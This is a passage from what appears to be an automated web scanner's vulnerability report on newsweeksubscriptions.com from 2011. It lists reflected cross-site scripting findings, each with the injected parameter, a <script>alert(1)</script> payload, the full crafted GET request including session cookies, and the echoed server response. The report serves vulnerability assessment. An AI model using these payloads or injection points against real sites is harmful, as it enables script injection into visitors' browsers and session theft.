Content-Type: text/html; charset=UTF-8
Content-Length: 52793


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
ion()
{
   if (openguard_busy==1) { return; }
   openguard_busy=1;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo5b713';alert(1)//66c9d26a207';


url += '&off2on_code=TDBNAV';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('
...[SNIP]...

1.238. https://www.newsweeksubscriptions.com/FTcontrol/index.php [paym parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the paym request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ae7"><script>alert(1)</script>7e268a9164ba3f7 was submitted in the paym parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=86ae7"><script>alert(1)</script>7e268a9164ba3f7&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:16:00 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<input autocomplete="off" type="hidden" name="paym" id="paym" value="86ae7"><script>alert(1)</script>7e268a9164ba3f7">
...[SNIP]...

1.239. https://www.newsweeksubscriptions.com/FTcontrol/index.php [sessid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the sessid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b02f"><script>alert(1)</script>163c0375087e87f2c was submitted in the sessid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d1b02f"><script>alert(1)</script>163c0375087e87f2c&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20703


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<input autocomplete="off" type="hidden" name="sessid" id="sessid" value="276b5e968c4ce6c9eaf6438a0420af5d1b02f"><script>alert(1)</script>163c0375087e87f2c">
...[SNIP]...

1.240. https://www.newsweeksubscriptions.com/FTcontrol/index.php [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/index.php

Issue detail

The value of the state request parameter is copied into the HTML document as plain text between tags. The payload 9ec71<script>alert(1)</script>48aa07ff265b6b0ec was submitted in the state parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /FTcontrol/index.php?template_id=new2_lp3&offer=USPLPNEWSWEEK277DBA&name=&address=&address2=&city=&zipcode=&state=AK9ec71<script>alert(1)</script>48aa07ff265b6b0ec&email=&bill_name=&bill_address=&bill_address2=&bill_city=&bill_zipcode=&bill_state=&bill_country=US&cc_number=&cc_month=&cc_year=&cc_type=billme&isgift=personal_gift&use_billing=0&semail=&list=&campaign_type=&kind=lp&interextra=&kindid=&submitted=Y&site=newsweek&sessid=276b5e968c4ce6c9eaf6438a0420af5d&sub_type=personal&paym=&upsellto= HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:51 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 20701


<html>
<head>
<title>Newsweek</title>

<script type="text/javascript" src="/js/prototype.js"></script>
<script type="text/javascript" src="/js/jquery-1.4.2.min.js"></script>
<script type="text/javas
...[SNIP]...
<br>
, AK9ec71<script>alert(1)</script>48aa07ff265b6b0ec <br>
...[SNIP]...

1.241. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2edad<script>alert(1)</script>02ccb64bc54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol2edad<script>alert(1)</script>02ccb64bc54/newsweek@emailcustomerservice.com HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:20 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 555
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol2edad<script>alert(1)</script>02ccb64bc54/newsweek@emailcustomerservice.com is not found !</p>
...[SNIP]...

1.242. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98f78<script>alert(1)</script>9ea529c6ac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com98f78<script>alert(1)</script>9ea529c6ac0 HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:16 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com98f78<script>alert(1)</script>9ea529c6ac0 is not found !</p>
...[SNIP]...

1.243. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12bcf<script>alert(1)</script>1936c9c86f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol12bcf<script>alert(1)</script>1936c9c86f7/newsweek@emailcustomerservice.com/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:06 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 555
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol12bcf<script>alert(1)</script>1936c9c86f7/newsweek@emailcustomerservice.com is not found !</p>
...[SNIP]...

1.244. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload dcc53<script>alert(1)</script>663f9a33b8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.comdcc53<script>alert(1)</script>663f9a33b8d/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.comdcc53<script>alert(1)</script>663f9a33b8d is not found !</p>
...[SNIP]...

1.245. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cf48<script>alert(1)</script>cbf6d265779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol5cf48<script>alert(1)</script>cbf6d265779/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:14 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol5cf48<script>alert(1)</script>cbf6d265779/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af is not found !</p>
...[SNIP]...

1.246. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8cbd<script>alert(1)</script>071e967c869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.come8cbd<script>alert(1)</script>071e967c869/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:27 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.come8cbd<script>alert(1)</script>071e967c869/Netsparker0b594b604acd4cc2b9db63005bfbe9af is not found !</p>
...[SNIP]...

1.247. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f5d0<script>alert(1)</script>4c2107201a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af9f5d0<script>alert(1)</script>4c2107201a6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af9f5d0<script>alert(1)</script>4c2107201a6 is not found !</p>
...[SNIP]...

1.248. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa22<script>alert(1)</script>d2dabff9a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolefa22<script>alert(1)</script>d2dabff9a4c/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:30 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolefa22<script>alert(1)</script>d2dabff9a4c/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5 is not found !</p>
...[SNIP]...

1.249. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e725c<script>alert(1)</script>5041d66dcbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.come725c<script>alert(1)</script>5041d66dcbf/Netsparker589cd9fdeb73414b91501b3a353febd5/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:35 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.come725c<script>alert(1)</script>5041d66dcbf/Netsparker589cd9fdeb73414b91501b3a353febd5 is not found !</p>
...[SNIP]...

1.250. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5243f<script>alert(1)</script>5b2c7c01ebb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd55243f<script>alert(1)</script>5b2c7c01ebb/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:39 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
